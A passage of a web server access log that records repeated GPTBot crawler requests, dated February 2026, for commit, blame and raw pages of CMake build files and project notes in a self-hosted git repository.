74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" +[17/Feb/2026:15:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" +[17/Feb/2026:15:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10074] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39743] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10176] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14307] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10422] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" +[17/Feb/2026:15:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" +[17/Feb/2026:15:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" [Client 74.7.227.38] [Length 10923] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" [Client 74.7.227.38] [Length 10927] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" +[17/Feb/2026:15:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" [Client 74.7.227.38] [Length 10930] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" +[17/Feb/2026:15:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" [Client 74.7.227.38] [Length 10725] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:06 +0000] - 200 200 - GET https 